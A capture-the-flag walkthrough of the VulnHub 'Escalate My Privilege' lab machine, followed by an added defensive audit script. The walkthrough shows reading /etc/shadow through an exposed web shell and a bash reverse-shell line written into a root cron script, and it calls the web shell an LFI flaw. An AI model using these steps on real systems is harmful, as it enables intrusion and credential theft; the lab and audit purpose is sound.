Escalate My Privilege Walkthrough

Introduction

Today we're doing a boot2root pentest walkthrough of the Escalate My Privilege machine, created by Akansha Sachin Verma and hosted at https://www.vulnhub.com/entry/escalate-my-privileges-1,448/.

For this pentest, I will be using two virtual machines: a Kali Linux machine as the attacking system and the Escalate My Privileges machine as the target system.

Locating The Target

This machine is configured so that the default login screen indicates the system's IP address on the network. Very nice!


Our target system is at 10.0.2.30.

Scanning and Enumeration

We start our scans with nmap to determine which TCP ports are open on the target.

nmap -T4 -p- 10.0.2.30


Five open ports. We'll plug these open ports into nmap again for a more detailed scan.

nmap -T4 -A -p22,80,111,2049,20048 10.0.2.30


phpbash.php seems like a very likely target for a Local File Inclusion (LFI) vulnerability. We will definitely check it out in a bit. Next we'll run Nikto against the system's web server.

nikto -h 10.0.2.30


phpbash.php shows up again. That page and phpinfo.php are ripe targets for LFI if the vulnerability is present on the web server. We also find readme.txt. Let's take a look at the system's webpage.

http://10.0.2.30


A picture of our goals. Very motivational! Let's check out the readme.txt page.

http://10.0.2.30/readme.txt


This is a serious hint. It tells us that there's a user on the system named armour, and that the user has some sort of backup-related files on the system, possibly in a directory called /backup. We note this information, then move on to the phpbash.php page.

http://10.0.2.30/phpbash.php


This looks like a Linux command line. Just for fun, we try to cat out the /etc/shadow file.

cat /etc/shadow


That really shouldn't have worked. We can potentially run these two users' password hashes through a password cracking program like John the Ripper. For now, let's check the shadow file's permissions.

ls -l /etc/shadow


Most systems don't leave the shadow file world readable like this. Let's try looking for the backup directory the readme.txt page was hinting at.

locate backup



Finding a Way In

Quite a few files are associated with the backup string. This backup.sh bash script in the armour user's home directory looks interesting, so we inspect it with the cat and ls commands.

cat /home/armour/backup.sh
ls -l /home/armour/backup.sh


The script just echoes the string "backup me", but according to the file permissions, the root user owns the script and any user can write to it. On a hunch, we cat out the system's /etc/crontab file to see which files are run on a schedule as cron jobs.


cat /etc/crontab


Sure enough, the backup.sh file is being run every minute or so as a cron job. Since any user can write to backup.sh, we can overwrite its contents with echo so that it runs a command that opens a remote shell back to our attacking system. And because backup.sh is owned by root and the cron job runs it with root privileges, the remote shell created on our attacking system will be a root shell.

Before we can go through with this plan, we will need to set up a netcat listener on our attacking system.

nc -nlvp 4242


Privilege Escalation

Now we go back to the phpbash.php page, overwrite the backup.sh file contents with echo, then wait for the cron job to execute the script.

echo "bash -i >& /dev/tcp/10.0.2.4/4242 0>&1" > /home/armour/backup.sh

Then we check our netcat listener after a minute or so.


Now that we have our root shell, let's confirm that we're root and then take a look at what's in the /root/ directory.

whoami
cd /root/
ls


The last thing to do before finishing with this system is to access the flag file.

cat proof.txt


Summary

After initial scans, we found that the system was vulnerable to Local File Inclusion due to the presence of a PHP page that sent commands directly to the target system as a low-privileged user. Using this PHP page to enumerate the target system, we found a root-owned bash script that was both world writable and run as a cron job. We exploited this script to create a root shell on our attacking system and used that shell to access the system's flag file.
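The two misconfigurations this box turns on, a cron-launched script that any user can overwrite and a world-readable /etc/shadow, are easy to check for on a system you administer. The script below is an added example and not part of the original walkthrough; it runs both checks against a constructed temporary tree (the paths, the fake crontab and the fake shadow file are all made up for the demo) rather than against the real system.

```shell
#!/bin/sh
# Added audit helper, not part of the walkthrough: flags cron command files
# non-root users can overwrite and a world-readable shadow file (demo tree).
# Print the program path from each cron entry (system or user crontab format).
cron_command_files() {
    awk '
        /^[[:space:]]*#/ { next }                          # comment line
        NF == 0 { next }                                   # blank line
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }    # VAR=value line
        {
            start = ($1 ~ /^@/) ? 2 : 6   # @reboot-style entry vs five time fields
            for (i = start; i <= NF; i++)
                if ($i ~ /^\//) { print $i; break }
        }' "$1"
}

# True when the "other" permission bits include w or r (given as $2); uses
# find so the answer does not depend on who runs the audit.
other_bit_set() {
    [ -n "$(find "$1" -prune -perm "-o+$2" -print 2>/dev/null)" ]
}

# Report cron command files that anyone on the box could overwrite.
audit_cron() {
    cron_command_files "$1" | while IFS= read -r f; do
        if [ -f "$f" ] && other_bit_set "$f" w; then echo "WRITABLE $f"; fi
    done
}

# Report a credential file that anyone can read.
audit_shadow() {
    if other_bit_set "$1" r; then echo "WORLD-READABLE $1"; fi
}

# Build a constructed demo tree that mirrors the box's layout (fake data).
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/home/armour"
    printf 'echo "backup me"\n' > "$d/home/armour/backup.sh"
    chmod 777 "$d/home/armour/backup.sh"                # the bug: world-writable
    printf 'exit 0\n' > "$d/sane.sh"; chmod 755 "$d/sane.sh"
    printf 'root:*:0:0:99999:7:::\n' > "$d/shadow"; chmod 644 "$d/shadow"
    printf 'SHELL=/bin/bash\n# fake system crontab\n* * * * * root %s/home/armour/backup.sh\n0 3 * * * root %s/sane.sh\n@reboot root %s/sane.sh\n' "$d" "$d" "$d" > "$d/crontab"
    echo "$d"
}

demo=$(make_demo)
audit_cron "$demo/crontab"       # prints WRITABLE .../home/armour/backup.sh
audit_shadow "$demo/shadow"      # prints WORLD-READABLE .../shadow
```

On a real host, point audit_cron at /etc/crontab and each file under /etc/cron.d, and audit_shadow at /etc/shadow; the same functions apply unchanged.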

Finish